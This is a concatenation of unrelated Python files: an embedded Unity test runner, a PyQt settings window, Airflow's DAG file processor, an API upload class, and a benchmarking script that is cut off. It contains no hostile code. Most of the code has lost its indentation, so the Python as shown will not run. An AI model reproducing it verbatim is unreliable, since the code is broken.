while time.time() < start_time + timeout:
if inputQueue.qsize() > 0:
str_line = inputQueue.get()
print(str_line)
test = None
try:
test = str_line.split(':')[2]
test_result = ':'.join(str_line.split(':')[2:4])
except IndexError:
pass
if test in tests:
tests.remove(test)
target[test]["tested"] = True
if test_result == test + ':PASS':
target[test]["pass"] = True
if len(tests) == 0:
break
stop_thread = True
serial_thread.join()
ser.close()
def print_summary(targets):
"""
Return 0 if all test passed
Return 1 if all test completed but one or more failed
Return 2 if one or more tests did not complete or was not detected
"""
passed = 0
failed = 0
tested = 0
expected = 0
return_code = 3
verdict_pass = colored('[ PASSED ]', 'green')
verdict_fail = colored('[ FAILED ]', 'red')
verdict_error = colored('[ ERROR ]', 'red')
print("-----------------------------------------------------------------------------------------------------------")
# Find all passed and failed
for target in targets:
for test in target["tests"]:
expected += 1
if target[test]["tested"]:
tested += 1
if target[test]["pass"]:
passed += 1
else:
failed += 1
if tested != expected:
print("{} Not all tests found".format(verdict_error))
print("{} Expected: {} Actual: {}".format(verdict_error, expected, tested))
return_code = 2
elif tested == passed:
return_code = 0
else:
return_code = 1
# print all test cases
sorted_tc = []
for target in targets:
for test in target["tests"]:
if not target[test]["tested"]:
tc_verdict = verdict_error
elif target[test]["pass"]:
tc_verdict = verdict_pass
else:
tc_verdict = verdict_fail
sorted_tc.append("{} {}: {}".format(tc_verdict, target["name"], test))
sorted_tc.sort()
for tc in sorted_tc:
print(tc)
total = 0
if (passed > 0):
total = passed / expected
if (total == 1.0):
verdict = verdict_pass
else:
verdict = verdict_fail
print("{} Summary: {} tests in total passed on {} targets ({})".
format(verdict, passed, len(targets), ', '.join([t['name'] for t in targets])))
print("{} {:.0f}% tests passed, {} tests failed out of {}".format(verdict, total*100, failed, expected))
return return_code
def test_targets(args):
"""
Return 0 if successful
Return 3 if no targets are detected
Return 4 if no tests are found
"""
result = 0
targets = []
main_tests = []
detect_targets(targets)
if len(targets) == 0:
print("No targets detected!")
return 3
download_unity()
if not parse_tests(targets, main_tests, args.specific_test):
print("No tests found?!")
return 4
for target in targets:
for tst in main_tests:
test_target_with_unity(target, args, tst)
result = print_summary(targets)
return result
def download_unity(force=False):
unity_dir = UNITY_PATH
unity_src = unity_dir+"src/"
process = subprocess.run(['mktemp'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
download_dir = process.stdout.strip()
run_command("rm -f {}".format(download_dir))
download_dir += '/'
# Check if already downloaded
if not force and path.isdir(unity_dir) and path.isfile(unity_src+"unity.c") and path.isfile(unity_src+"unity.h"):
return
if path.isdir(download_dir):
shutil.rmtree(download_dir)
if path.isdir(unity_dir):
shutil.rmtree(unity_dir)
os.mkdir(unity_dir)
os.makedirs(download_dir, exist_ok=False)
current_dir = os.getcwd()
os.chdir(download_dir)
process = subprocess.Popen("curl -LJO https://api.github.com/repos/ThrowTheSwitch/Unity/tarball/v2.5.0".split(),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True)
for line in process.stderr:
print(line.strip())
print()
    line = None
    for line in process.stdout:
        pass  # keep only the last stdout line, which names the saved file
    if not line:
        error_handler(671)
    m = re.search(r"'(.+?)'", line.strip())
    if m is None:
        # re.search returns None when nothing matches; it does not raise
        error_handler(673, "could not extract the downloaded file name")
    downloaded_file = download_dir + m.group(1)
os.chdir(current_dir)
try:
filename_base = downloaded_file.split('-')[0]
except IndexError as e:
error_handler(674, e)
if not filename_base:
error_handler(675)
run_command("tar xzf "+downloaded_file+" -C "+unity_dir+" --strip-components=1")
os.chdir(current_dir)
# Cleanup
shutil.rmtree(download_dir)
def parse_tests(targets, main_tests, specific_test=None):
"""
Generate test runners and parse it to know what to expect from the serial console
Return True if successful
"""
test_found = False
directory = 'TestCases'
    if specific_test and '/' in specific_test:
        # take the final path component; str.strip(directory) would strip
        # characters, not the "TestCases/" prefix
        specific_test = specific_test.split('/')[-1]
for dir in next(os.walk(directory))[1]:
if re.search(r'test_arm', dir):
if specific_test and dir != specific_test:
continue
test_found = True
testpath = directory + '/' + dir + '/Unity/'
ut_test_file = None
for content in os.listdir(testpath):
if re.search(r'unity_test_arm', content):
ut_test_file = content
if ut_test_file is None:
print("Warning: invalid path: ", testpath)
continue
main_tests.append(testpath)
ut_test_file_runner = path.splitext(ut_test_file)[0] + '_runner' + path.splitext(ut_test_file)[1]
test_code = testpath + ut_test_file
test_runner_path = testpath + 'TestRunner/'
if not os.path.exists(test_runner_path):
os.mkdir(test_runner_path)
test_runner = test_runner_path + ut_test_file_runner
for old_files in glob.glob(test_runner_path + '/*'):
if not old_files.endswith('readme.txt'):
os.remove(old_files)
# Generate test runners
run_command('ruby '+UNITY_PATH+'auto/generate_test_runner.rb ' + test_code + ' ' + test_runner)
test_found = parse_test(test_runner, targets)
if not test_found:
return False
if not test_found:
return False
return True
def parse_test(test_runner, targets):
tests_found = False
# Get list of tests
try:
read_file = open(test_runner, "r")
except IOError as e:
error_handler(670, e)
else:
with read_file:
for line in read_file:
if not line:
break
if re.search(r" run_test\(", line) and len(line.strip().split(',')) == 3:
function = line.strip().split(',')[0].split('(')[1]
tests_found = True
for target in targets:
if 'tests' not in target.keys():
target['tests'] = []
target["tests"].append(function)
target[function] = {}
target[function]["pass"] = False
target[function]["tested"] = False
return tests_found
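# The generated runner is assumed to contain lines of roughly this shape, which
# the regex and the three-way comma split above rely on:
#   run_test(test_arm_avgpool_s8, "test_arm_avgpool_s8", 12);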
if __name__ == '__main__':
args = parse_args()
sys.exit(test_targets(args))
|
WrappedVisualizationWindow.py
|
import pickle
import time
import threading
from PyQt5 import QtWidgets
from PyQt5.QtWidgets import (QWidget, QToolTip, QPushButton, QApplication, QMessageBox)
from .VisualizationWindow import VisualizationWindow
import sys
sys.path.append("...")
from backend import ModuleManipulator
class WrappedVisualizationWindow(VisualizationWindow, QtWidgets.QMainWindow):
def __init__(self):
super().__init__()
self.setupUi(self)
self.setWindowTitle('Визуализация')
self.settings = {
'linear': True,
'log': True,
'corr': True,
'heatmap': True,
'scatter': True,
'hist': True,
'box': True,
'piechart': True,
'dotplot': True,
}
self.checkBoxPie.setChecked(True)
self.checkBoxLinear.setChecked(True)
self.checkBoxHeatmap.setChecked(True)
self.checkBoxLog.setChecked(True)
self.checkBoxHist.setChecked(True)
self.checkBoxCorr.setChecked(True)
self.checkBoxBox.setChecked(True)
self.checkBoxScatter.setChecked(True)
self.checkBoxDot.setChecked(True)
self.__build_buttons()
def __build_buttons(self):
self.pushButton.clicked.connect(self.back)
self.pushButtonDone.clicked.connect(self.done)
self.checkBoxPie.clicked.connect(self.check_pie)
self.checkBoxLinear.clicked.connect(self.check_linear)
self.checkBoxLog.clicked.connect(self.check_log)
self.checkBoxCorr.clicked.connect(self.check_corr)
self.checkBoxHeatmap.clicked.connect(self.check_heatmap)
self.checkBoxScatter.clicked.connect(self.check_scatter)
self.checkBoxHist.clicked.connect(self.check_hist)
self.checkBoxBox.clicked.connect(self.check_box)
self.checkBoxDot.clicked.connect(self.check_dot)
def back(self):
self.hide()
self.parent.show()
def done(self):
with open('settings.py', 'rb') as f:
data = pickle.load(f)
data['MODULE_SETTINGS']['graphs'].update(self.settings)
with open('settings.py', 'wb') as f:
pickle.dump(data, f)
with open('settings.py', 'rb') as f:
settings = pickle.load(f)
module_starter = ModuleManipulator(settings)
threading.Thread(target=module_starter.start, daemon=True).start()
self.hide()
self.child.show()
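    # Assumed layout of the pickled settings file, inferred from the update()
    # call above: {'MODULE_SETTINGS': {'graphs': {...}}, ...}; the checkbox
    # states are merged into the 'graphs' sub-dict before the module starts.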
    # Each handler mirrors its checkbox state into the settings dict.
    def check_linear(self):
        self.settings['linear'] = self.checkBoxLinear.isChecked()
    def check_log(self):
        self.settings['log'] = self.checkBoxLog.isChecked()
    def check_corr(self):
        self.settings['corr'] = self.checkBoxCorr.isChecked()
    def check_heatmap(self):
        self.settings['heatmap'] = self.checkBoxHeatmap.isChecked()
    def check_scatter(self):
        self.settings['scatter'] = self.checkBoxScatter.isChecked()
    def check_hist(self):
        self.settings['hist'] = self.checkBoxHist.isChecked()
    def check_box(self):
        self.settings['box'] = self.checkBoxBox.isChecked()
    def check_dot(self):
        self.settings['dotplot'] = self.checkBoxDot.isChecked()
    def check_pie(self):
        self.settings['piechart'] = self.checkBoxPie.isChecked()
|
processor.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import datetime
import logging
import multiprocessing
import os
import signal
import threading
from contextlib import redirect_stderr, redirect_stdout, suppress
from datetime import timedelta
from multiprocessing.connection import Connection as MultiprocessingConnection
from typing import Iterator, List, Optional, Set, Tuple
from setproctitle import setproctitle
from sqlalchemy import func, or_
from sqlalchemy.orm.session import Session
from airflow import models, settings
from airflow.configuration import conf
from airflow.exceptions import AirflowException, TaskNotFound
from airflow.models import SlaMiss, errors
from airflow.models.dag import DAG, DagModel
from airflow.models.dagbag import DagBag
from airflow.stats import Stats
from airflow.utils import timezone
from airflow.utils.callback_requests import (
CallbackRequest,
DagCallbackRequest,
SlaCallbackRequest,
TaskCallbackRequest,
)
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.session import NEW_SESSION, provide_session
from airflow.utils.state import State
DR = models.DagRun
TI = models.TaskInstance
class DagFileProcessorProcess(LoggingMixin, MultiprocessingStartMethodMixin):
"""Runs DAG processing in a separate process using DagFileProcessor
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: str
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: List[str]
:param callback_requests: failure callback to execute
:type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(
self,
file_path: str,
pickle_dags: bool,
dag_ids: Optional[List[str]],
callback_requests: List[CallbackRequest],
):
super().__init__()
self._file_path = file_path
self._pickle_dags = pickle_dags
self._dag_ids = dag_ids
self._callback_requests = callback_requests
        # The process that was launched to process the given file.
self._process: Optional[multiprocessing.process.BaseProcess] = None
# The result of DagFileProcessor.process_file(file_path).
self._result: Optional[Tuple[int, int]] = None
# Whether the process is done running.
self._done = False
# When the process started.
self._start_time: Optional[datetime.datetime] = None
# This ID is use to uniquely name the process / thread that's launched
# by this processor instance
self._instance_id = DagFileProcessorProcess.class_creation_counter
self._parent_channel: Optional[MultiprocessingConnection] = None
DagFileProcessorProcess.class_creation_counter += 1
@property
def file_path(self) -> str:
return self._file_path
@staticmethod
def _run_file_processor(
result_channel: MultiprocessingConnection,
parent_channel: MultiprocessingConnection,
file_path: str,
pickle_dags: bool,
dag_ids: Optional[List[str]],
thread_name: str,
callback_requests: List[CallbackRequest],
) -> None:
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:type result_channel: multiprocessing.Connection
:param parent_channel: the parent end of the channel to close in the child
:type parent_channel: multiprocessing.Connection
:param file_path: the file to process
:type file_path: str
:param pickle_dags: whether to pickle the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
:param dag_ids: if specified, only examine DAG ID's that are
in this list
:type dag_ids: list[str]
:param thread_name: the name to use for the process that is launched
:type thread_name: str
:param callback_requests: failure callback to execute
:type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
:return: the process that was launched
:rtype: multiprocessing.Process
"""
# This helper runs in the newly created process
log: logging.Logger = logging.getLogger("airflow.processor")
# Since we share all open FDs from the parent, we need to close the parent side of the pipe here in
# the child, else it won't get closed properly until we exit.
log.info("Closing parent pipe")
parent_channel.close()
del parent_channel
set_context(log, file_path)
setproctitle(f"airflow scheduler - DagFileProcessor {file_path}")
try:
# redirect stdout/stderr to log
with redirect_stdout(StreamLogWriter(log, logging.INFO)), redirect_stderr(
StreamLogWriter(log, logging.WARN)
), Stats.timer() as timer:
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
log.info("Started process (PID=%s) to work on %s", os.getpid(), file_path)
dag_file_processor = DagFileProcessor(dag_ids=dag_ids, log=log)
result: Tuple[int, int] = dag_file_processor.process_file(
file_path=file_path,
pickle_dags=pickle_dags,
callback_requests=callback_requests,
)
result_channel.send(result)
log.info("Processing %s took %.3f seconds", file_path, timer.duration)
except Exception:
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
result_channel.close()
def start(self) -> None:
"""Launch the process and start processing the DAG."""
start_method = self._get_multiprocessing_start_method()
context = multiprocessing.get_context(start_method)
_parent_channel, _child_channel = context.Pipe(duplex=False)
process = context.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
_parent_channel,
self.file_path,
self._pickle_dags,
self._dag_ids,
f"DagFileProcessor{self._instance_id}",
self._callback_requests,
),
name=f"DagFileProcessor{self._instance_id}-Process",
)
self._process = process
self._start_time = timezone.utcnow()
process.start()
# Close the child side of the pipe now the subprocess has started -- otherwise this would prevent it
# from closing in some cases
_child_channel.close()
del _child_channel
# Don't store it on self until after we've started the child process - we don't want to keep it from
# getting GCd/closed
self._parent_channel = _parent_channel
def kill(self) -> None:
"""Kill the process launched to process the file, and ensure consistent state."""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
self._kill_process()
def terminate(self, sigkill: bool = False) -> None:
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None or self._parent_channel is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
with suppress(TimeoutError):
self._process._popen.wait(5) # type: ignore
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self) -> None:
if self._process is None:
raise AirflowException("Tried to kill process before starting!")
if self._process.is_alive() and self._process.pid:
self.log.warning("Killing DAGFileProcessorProcess (PID=%d)", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
if self._parent_channel:
self._parent_channel.close()
@property
def pid(self) -> int:
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None or self._process.pid is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self) -> Optional[int]:
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get exit code before starting!")
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self) -> bool:
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None or self._parent_channel is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
# If we get an EOFError, it means the child end of the pipe has been closed. This only happens
# in the finally block. But due to a possible race condition, the process may have not yet
# terminated (it could be doing cleanup/python shutdown still). So we kill it here after a
# "suitable" timeout.
self._done = True
# Arbitrary timeout -- error/race condition only, so this doesn't need to be tunable.
self._process.join(timeout=5)
if self._process.is_alive():
# Didn't shut down cleanly - kill it
self._kill_process()
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self) -> Optional[Tuple[int, int]]:
"""
:return: result of running DagFileProcessor.process_file()
:rtype: tuple[int, int] or None
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self) -> datetime.datetime:
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
@property
def waitable_handle(self):
return self._process.sentinel
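# Lifecycle sketch (illustrative, not taken from the Airflow sources): a manager
# would construct one processor per DAG file, start it, poll `done`, then read
# the (dag count, import error count) result:
#
#   proc = DagFileProcessorProcess("/dags/example.py", False, None, [])
#   proc.start()
#   while not proc.done:
#       time.sleep(0.1)
#   print(proc.result, proc.exit_code)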
class DagFileProcessor(LoggingMixin):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Execute any Callbacks if passed to DagFileProcessor.process_file
3. Serialize the DAGs and save it to DB (or update existing record in the DB).
4. Pickle the DAG and save it to the DB (if necessary).
5. Record any errors importing the file into ORM
Returns a tuple of 'number of dags found' and 'the count of import errors'
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: List[str]
:param log: Logger to save the processing process
:type log: logging.Logger
"""
UNIT_TEST_MODE: bool = conf.getboolean('core', 'UNIT_TEST_MODE')
def __init__(self, dag_ids: Optional[List[str]], log: logging.Logger):
super().__init__()
self.dag_ids = dag_ids
self._log = log
@provide_session
def manage_slas(self, dag: DAG, session: Session = None) -> None:
"""
        Find all tasks that have SLAs defined and send alert emails
        where needed. New SLA misses are also recorded in the database.
We are assuming that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
self.log.info("Running SLA Checks for %s", dag.dag_id)
if not any(isinstance(ti.sla, timedelta) for ti in dag.tasks):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
qry = (
session.query(TI.task_id, func.max(DR.execution_date).label('max_ti'))
.join(TI.dag_run)
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(or_(TI.state == State.SUCCESS, TI.state == State.SKIPPED))
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id)
.subquery('sq')
)
# get recorded SlaMiss
recorded_slas_query = set(
session.query(SlaMiss.dag_id, SlaMiss.task_id, SlaMiss.execution_date).filter(
SlaMiss.dag_id == dag.dag_id, SlaMiss.task_id.in_(dag.task_ids)
)
)
max_tis: Iterator[TI] = (
session.query(TI)
.join(TI.dag_run)
.filter(
TI.dag_id == dag.dag_id,
TI.task_id == qry.c.task_id,
DR.execution_date == qry.c.max_ti,
)
)
ts = timezone.utcnow()
for ti in max_tis:
task = dag.get_task(ti.task_id)
if not task.sla:
continue
if not isinstance(task.sla, timedelta):
raise TypeError(
f"SLA is expected to be timedelta object, got "
f"{type(task.sla)} in {task.dag_id}:{task.task_id}"
)
sla_misses = []
next_info = dag.next_dagrun_info(dag.get_run_data_interval(ti.dag_run), restricted=False)
if next_info is None:
self.log.info("Skipping SLA check for %s because task does not have scheduled date", ti)
else:
while next_info.logical_date < ts:
next_info = dag.next_dagrun_info(next_info.data_interval, restricted=False)
if next_info is None:
break
if (ti.dag_id, ti.task_id, next_info.logical_date) in recorded_slas_query:
break
if next_info.logical_date + task.sla < ts:
sla_miss = SlaMiss(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=next_info.logical_date,
timestamp=ts,
)
sla_misses.append(sla_miss)
if sla_misses:
session.add_all(sla_misses)
session.commit()
slas: List[SlaMiss] = (
session.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa
.all()
)
if slas:
sla_dates: List[datetime.datetime] = [sla.execution_date for sla in slas]
fetched_tis: List[TI] = (
session.query(TI)
.filter(TI.state != State.SUCCESS, TI.execution_date.in_(sla_dates), TI.dag_id == dag.dag_id)
.all()
)
blocking_tis: List[TI] = []
for ti in fetched_tis:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join(sla.task_id + ' on ' + sla.execution_date.isoformat() for sla in slas)
blocking_task_list = "\n".join(
ti.task_id + ' on ' + ti.execution_date.isoformat() for ti in blocking_tis
)
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info('Calling SLA miss callback')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas, blocking_tis)
notification_sent = True
except Exception:
self.log.exception("Could not call sla_miss_callback for DAG %s", dag.dag_id)
email_content = f"""\
Here's a list of tasks that missed their SLAs:
        <pre><code>{task_list}\n</code></pre>
Blocking tasks:
        <pre><code>{blocking_task_list}</code></pre>
Airflow Webserver URL: {conf.get(section='webserver', key='base_url')}
"""
tasks_missed_sla = []
for sla in slas:
try:
task = dag.get_task(sla.task_id)
except TaskNotFound:
# task already deleted from DAG, skip it
self.log.warning(
"Task %s doesn't exist in DAG anymore, skipping SLA miss notification.", sla.task_id
)
continue
tasks_missed_sla.append(task)
emails: Set[str] = set()
for task in tasks_missed_sla:
if task.email:
if isinstance(task.email, str):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(emails, f"[airflow] SLA miss on DAG={dag.dag_id}", email_content)
email_sent = True
notification_sent = True
except Exception:
Stats.incr('sla_email_notification_failure')
self.log.exception("Could not send SLA Miss email notification for DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
sla.email_sent = email_sent
sla.notification_sent = True
session.merge(sla)
session.commit()
@staticmethod
def update_import_errors(session: Session, dagbag: DagBag) -> None:
"""
        For the DAGs in the given DagBag, record any associated import errors and clear
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(
errors.ImportError.filename.startswith(dagbag_file)
).delete(synchronize_session="fetch")
# Add the errors of the processed files
for filename, stacktrace in dagbag.import_errors.items():
(
session.query(DagModel)
.filter(DagModel.fileloc == filename)
.update({'has_import_errors': True}, synchronize_session='fetch')
)
session.add(
errors.ImportError(filename=filename, timestamp=timezone.utcnow(), stacktrace=stacktrace)
)
session.commit()
@provide_session
def execute_callbacks(
self, dagbag: DagBag, callback_requests: List[CallbackRequest], session: Session = NEW_SESSION
) -> None:
"""
Execute on failure callbacks. These objects can come from SchedulerJob or from
DagFileProcessorManager.
:param dagbag: Dag Bag of dags
:param callback_requests: failure callbacks to execute
:type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
:param session: DB session.
"""
for request in callback_requests:
self.log.debug("Processing Callback Request: %s", request)
try:
if isinstance(request, TaskCallbackRequest):
self._execute_task_callbacks(dagbag, request)
elif isinstance(request, SlaCallbackRequest):
self.manage_slas(dagbag.get_dag(request.dag_id), session=session)
elif isinstance(request, DagCallbackRequest):
self._execute_dag_callbacks(dagbag, request, session)
except Exception:
self.log.exception(
"Error executing %s callback for file: %s",
request.__class__.__name__,
request.full_filepath,
)
session.commit()
@provide_session
def _execute_dag_callbacks(self, dagbag: DagBag, request: DagCallbackRequest, session: Session):
dag = dagbag.dags[request.dag_id]
dag_run = dag.get_dagrun(run_id=request.run_id, session=session)
dag.handle_callback(
dagrun=dag_run, success=not request.is_failure_callback, reason=request.msg, session=session
)
def _execute_task_callbacks(self, dagbag: DagBag, request: TaskCallbackRequest):
simple_ti = request.simple_task_instance
if simple_ti.dag_id in dagbag.dags:
dag = dagbag.dags[simple_ti.dag_id]
if simple_ti.task_id in dag.task_ids:
task = dag.get_task(simple_ti.task_id)
if request.is_failure_callback:
ti = TI(task, run_id=simple_ti.run_id)
# TODO: Use simple_ti to improve performance here in the future
ti.refresh_from_db()
ti.handle_failure_with_callback(error=request.msg, test_mode=self.UNIT_TEST_MODE)
self.log.info('Executed failure callback for %s in state %s', ti, ti.state)
@provide_session
def process_file(
self,
file_path: str,
callback_requests: List[CallbackRequest],
pickle_dags: bool = False,
session: Session = None,
) -> Tuple[int, int]:
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Execute any Callbacks if passed to this method.
3. Serialize the DAGs and save it to DB (or update existing record in the DB).
4. Pickle the DAG and save it to the DB (if necessary).
5. Mark any DAGs which are no longer present as inactive
6. Record any errors importing the file into ORM
:param file_path: the path to the Python file that should be executed
:type file_path: str
:param callback_requests: failure callback to execute
:type callback_requests: List[airflow.utils.dag_processing.CallbackRequest]
        :param pickle_dags: whether to serialize the DAGs found in the file and
save them to the db
:type pickle_dags: bool
:param session: Sqlalchemy ORM Session
:type session: Session
:return: number of dags found, count of import errors
:rtype: Tuple[int, int]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
try:
dagbag = DagBag(file_path, include_examples=False, include_smart_sensor=False)
except Exception:
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return 0, 0
self._deactivate_missing_dags(session, dagbag, file_path)
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return 0, len(dagbag.import_errors)
self.execute_callbacks(dagbag, callback_requests)
# Save individual DAGs in the ORM
dagbag.sync_to_db()
if pickle_dags:
paused_dag_ids = DagModel.get_paused_dag_ids(dag_ids=dagbag.dag_ids)
unpaused_dags: List[DAG] = [
dag for dag_id, dag in dagbag.dags.items() if dag_id not in paused_dag_ids
]
for dag in unpaused_dags:
dag.pickle(session)
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception:
self.log.exception("Error logging import errors!")
return len(dagbag.dags), len(dagbag.import_errors)
def _deactivate_missing_dags(self, session: Session, dagbag: DagBag, file_path: str) -> None:
deactivated = (
session.query(DagModel)
.filter(DagModel.fileloc == file_path, DagModel.is_active, ~DagModel.dag_id.in_(dagbag.dag_ids))
.update({DagModel.is_active: False}, synchronize_session="fetch")
)
if deactivated:
self.log.info("Deactivated %i DAGs which are no longer present in %s", deactivated, file_path)
|
send_policy.py
|
from threading import Thread
from time import sleep, time
#import face_recognition
import requests
#import numpy as np
import yaml
import os
class SendPolicy:
def __init__(self) -> None:
"""
        Initialize the SendPolicy module, setting up its state.
"""
self.ready = True
with open(f'config{os.sep}config_insp.yaml', 'r') as f:
            self.vars = yaml.safe_load(f)  # yaml.load() without a Loader is unsafe/deprecated
self.URL = self.vars['url_api']
self.time = self.vars['delay']
self.request_info = {
'ts': self.get_now(),
'location': self.vars['location']
}
self.upload_info = {
'file_uploaded': None
}
self.past_req = {}
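    # config/config_insp.yaml is assumed to provide at least these keys
    # (values below are placeholders, not from the original project):
    #   url_api: "https://api.example.invalid/detections"
    #   delay: 5
    #   location: "entrance-cam-01"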
def get_now(self) -> int:
"""
        Return the current time as an integer Unix timestamp.
        Returns:
            int: current timestamp, shifted to GMT-3.
"""
# With timezone GMT-3
return int(time())-10800
def send(self, frame_in_bytes: bytes) -> None:
"""
        Send the packet to the API on a background thread, but only if the
        configured delay since the previous send has already elapsed.
Args:
frame_in_bytes (bytes): bytes to send as a file.
"""
if self.ready:
self.ready = False
exe = Thread(target=self.send2api, args=(frame_in_bytes,))
exe.start()
def send2api(self, frame_in_bytes: bytes = None) -> None:
"""
        Send data to the API. If a mask violation was detected, also send the frame as a file.
Args:
frame_in_bytes (bytes): Default to None. Bytes to send as a file.
"""
# get current time
self.request_info['ts'] = self.get_now()
# build file structure
if frame_in_bytes:
self.upload_info['file_uploaded'] = (
'gotcha_frame.jpg',
frame_in_bytes
)
else:
self.upload_info['file_uploaded'] = None
# verify duplicated request
if self.past_req != [frame_in_bytes,self.request_info['ts']]:
# send req. / receive response to API
response = requests.post(
self.URL,
data=self.request_info,
files=self.upload_info
)
self.past_req = [
frame_in_bytes,
self.request_info['ts']
]
# print status
print(response.status_code, response.json(), sep=' -|- ')
# give a break of request! hehe
self.wait_until_ready(self.time)
def wait_until_ready(self, time2wait):
"""
Sleeps for <time2wait> seconds
Args:
time2wait (int): Seconds to wait
"""
sleep(time2wait)
self.ready = True
|
Test_time_RAM_CPU.py
|
from subprocess import call
from Select_15_min import process_stop
import threading
import psutil
import os
import time
import csv
def llamada(programa, parametros):
    # Build a single space-separated argument string and run the program.
    params = " ".join(parametros)
    return_code = call([programa, params])
    return return_code
def memory_usage_psutil():
process = psutil.Process(os.getpid())
mem = process.memory_info().rss / float(2 ** 20) # return the memory usage in MB
memory = psutil.virtual_memory()
cpu = psutil.cpu_percent()
return mem,memory,cpu
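# mem is this process's RSS in MB; memory is the system-wide virtual_memory()
# snapshot; cpu is the instantaneous system CPU percentage.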
def date_last_modify(path):
date = os.path.getmtime(path)
return date
algorithm = "Minsait"
iters = 10
log = "logs_time_RAM_CPU.csv"
""" Ejecucion Select_15_min.py """
duerme = 360 # segundos
entrada = "Datos_Manual_Febrero19.csv"
input = "C:\\OrquestadorTT\\NORTE\\Algoritmos\\dataanalytics.predictive\\data\\TT_NL.csv"
resultados = "C:\\OrquestadorTT\\NORTE\\Algoritmos\\dataanalytics.predictive\\output\\results.csv"
t1 = threading.Thread(target=process_stop, args=(entrada, input, duerme, iters))
""" Ejecucion MULTIALGORITMO """
programa = "python C:\\OrquestadorTT\\NORTE\\Algoritmos\\dataanalytics.predictive\\src\\main.py"
